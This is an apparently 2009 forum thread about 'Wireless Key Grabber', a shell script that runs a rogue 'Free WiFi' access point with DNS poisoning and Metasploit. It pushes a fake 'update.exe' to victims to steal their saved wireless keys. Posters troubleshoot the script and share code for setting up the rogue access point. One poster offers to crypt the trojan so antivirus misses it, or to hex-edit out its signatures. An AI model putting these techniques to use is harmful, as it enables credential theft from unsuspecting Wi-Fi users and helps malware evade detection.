Wireless Key Grabber (WKG) Fully automated

[hm2075]

check out the man pages of airbase-ng, it should tell you on there

[_jond]

Subscribing to this thread. Pure genius in the making...

[fload]

am i missing something? i get a few errors
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
Stopping DHCP server: dhcpd3 failed!

[Eatme]

cool this is something i been waiting FOR !!!!!!!!!!!!!!!!!!!!!!!

BTW - if the victim has a good AVS installed this won't work cuz "update.exe" file is detetced. by 14 avs's.

File Info

Report generated: 24.8.2009 at 7.02.43 (GMT 1)
Filename: update.exe
File size: 9 KB
MD5 Hash: 52ab75a06b8f348c67e7f392fa074ed6
SHA1 Hash: CDB5AB27A3D0B22C9A4886ECB8C5383743FC3595
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 14 on 22

Detections

a-squared - Virus.Win32.Exploider!IK
Avira AntiVir - TR/Small.cbi.4
Avast - Win32:Exploider-G [Trj]
AVG - Downloader.Small.61.BO
BitDefender - -
ClamAV - -
Comodo - TrojWare.Win32.Small.cbi
Dr.Web - -
Ewido - -
F-PROT6 - W32/WMFexploit.A.gen!Eldorado
Ikarus T3 - Virus.Win32.Exploider
Kaspersky - Trojan.Win32.Small.cbi
McAfee - Downloader-BQQ trojan
NOD32 v3 - -
Norman - Trojan W32/Smalltroj.QLBR
Panda - -
QuickHeal - Trojan.Agent.ATV
Solo Antivirus - Trojan.Win32.Small.Cbi
Sophos - Mal/UnkPack-Fam
TrendMicro - -
VBA32 - Trojan.Win32.Small.cbi
VirusBuster - -

Scan report generated by
NoVirusThanks.org

Quote:

http://scanner.novirusthanks.org/ind...25541093278872

But i can easly crypt the file and make it 100% fud = fully undetected.

Quote:

Originally Posted by fload

am i missing something? i get a few errors
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
Stopping DHCP server: dhcpd3 failed!

i get same errors too..and more

Quote:

Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....
FakeAp started
Loading Metasploit with hb.rc
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....
Metasploit should be loading, keep an eye on metasploit for victims
Setting up IPTABLES
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
./wkg.sh: line 66: /etc/init.d/dhcp3-server: No such file or directory
IPTABLES updated and dhcp server started
starting webserver
./wkg.sh: line 72: /etc/init.d/lighttpd: No such file or directory
2009-08-25 00:27:29: (server.c.746) can't find username www-data
Web server started
Starting dns redirector
DNS poison started, check DNS poison if victims are being redirected to our webserver
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....

[SoftwareDefinesRadio]

hm2075,


This is very good.

Thank you

[arubinst]

Quote:

Originally Posted by Eatme

But i can easly crypt the file and make it 100% fud = fully undetected.

Hi!

May I ask what tool you would use to encrypt the exe file? Are there any free options for this?

And wouldn't the encrypted file need to be decrypted to memory for execution, thus making the payload detectable to the AVS before it runs?

Thanks

@OP dhcpd3 was not starting on my BT4 PF. I had to modify the line that starts the server. Besides that, your script is really beautiful.

[Nick_the_Greek]

@fload and @Eatme

Quote:

Originally Posted by fload

am i missing something? i get a few errors
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
Stopping DHCP server: dhcpd3 failed!

Check out guys wkg.sh script, line 6:

Code:

export   fakeap_interface=wlan0

Change wlan0 to the interface name of your card. (ath0 ,ra0 or whatever)
Also in line 36 where airbase-ng is starting softAP:

Code:

xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -e "Free WiFi" mon0 -v&

Change mon0 to whatever your interface is called when your cards gets into monitor mode. (hope you understand me.I know, my English are...)
@Eatme
Are you running BT4PF?

Quote:

Originally Posted by Eatme

xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....
./wkg.sh: line 66: /etc/init.d/dhcp3-server: No such file or directory

Quote:

Originally Posted by Eatme

./wkg.sh: line 72: /etc/init.d/lighttpd: No such file or directory

wkg.sh line 12

Quote:

"Have you downloaded lighttpd? if not open a shell and type apt-get install lighttpd"

@hm2075 Great job. You can also use this:

Code:

echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
read -e MAC
echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
read -e CHAN
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
cmd="konsole -e airbase-ng -e ""$ESSID""  -v "
if [ -n "$CHAN" ]; then
cmd=$cmd"-c "$CHAN" "
fi
if [ -n "$MAC" ]; then
cmd=$cmd"-a "$MAC" "
fi
cmd=$cmd"$WIFACE"
$cmd &

Taken from Roguev3.sh - fifo_thekid. So, anyone can use your script with any card , at any channel, MAC, etc. You know better...
Keep it up hm2075

[Eatme]

Quote:

Originally Posted by Nick_the_Greek

@fload and @Eatme
Check out guys wkg.sh script, line 6:

Code:

export   fakeap_interface=wlan0

Change wlan0 to the interface name of your card. (ath0 ,ra0 or whatever)
Also in line 36 where airbase-ng is starting softAP:

Code:

xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -e "Free WiFi" mon0 -v&

Change mon0 to whatever your interface is called when your cards gets into monitor mode. (hope you understand me.I know, my English are...)
@Eatme
Are you running BT4PF?


wkg.sh line 12

1.No Im using BT3
2.If the script already includes wlan0 as the interface, (which is what i use) then idk why its not working..
3.I see where it uses mon0, ill change that and see if it works..ill report back asap. other wise idk...

Ps- Thanks for the detailed help. I appreciate it..

Quote:

Originally Posted by arubinst

Hi!

May I ask what tool you would use to encrypt the exe file? Are there any free options for this?

And wouldn't the encrypted file need to be decrypted to memory for execution, thus making the payload detectable to the AVS before it runs?

Thanks

@OP dhcpd3 was not starting on my BT4 PF. I had to modify the line that starts the server. Besides that, your script is really beautiful.

i use my private crypter that i coded. If you want your update.exe crypted just ask and ill post new file in thread. Or you can easily Hex the updater.exe using any free Hex editor and take out the AV signatures...I can find a tut for you if you need one, if you can't find one..let me know I have no problem helping people that are in need.

Good luck trying to find a public FUD crypter. tho

@Nick The Greek

Thanks, this helped im geting progress even from before but im stuck here..Im also seeing Broadcast's being made...idk if thats a good thing or not.Last time i didn't see them before.

Quote:

Metasploit should be loading, keep an eye on metasploit for victims
Setting up IPTABLES
./wkg.sh: line 66: /etc/init.d/dhcp3-server: No such file or directory
IPTABLES updated and dhcp server started
starting webserver
./wkg.sh: line 72: /etc/init.d/lighttpd: No such file or directory
2009-08-28 20:19:08: (server.c.746) can't find username www-data
Web server started
Starting dns redirector
DNS poison started, check DNS poison if victims are being redirected to our webserver
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1" , trying "fixed"....
Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited
Opening WKV folder, keys will be uploaded in here

oh yea i did, install lighttdp too, even b4 this.

Edit: YES! I finally got a connection (which was my pc im currently on) I saw my "Free Wifi" Broadcasting. So I tried connecting to it, but there was a network problem. Idk if this has to do with the error(s) above, or its cuz im on Windows 7 RTM.

BT3-VMware


NVM all the errors i posted...i went to BT4-PF (i dont even know why i was using bt3 in the 1st place i forgot) so i ran this script without bt3...and I ran into 0 errors...Thanks. ! for anybody that runs into the same errors i ran into or similar, just use BT4.

the only thing is that, when the victim(me) connects to Fake AP I get limited Access, but windows7 auto fixed it but it took 1 min for it to fix its self..

Also after downloading the update.exe, when executing the file on the targeted pc(mine) nothing happens
-no keys showed
-the file didn't even open (i even checked Taskmgr, while doing this and it never shows) but other then that everything else ran smooth

[floyd]

Everything works fine here... But I tried your update.exe in a Vista VM and it didn't work. How have you compiled this exe? Where is the source code?

[Eatme]

Quote:

Originally Posted by floyd

Everything works fine here... But I tried your update.exe in a Vista VM and it didn't work. How have you compiled this exe? Where is the source code?

wow after editing my above post before yours.. update.exe isn't working for me either...i didnn't really see what you said intell after..

but yea its not running on windows 7 nor vista.

corrupted ?

compile source would be useful..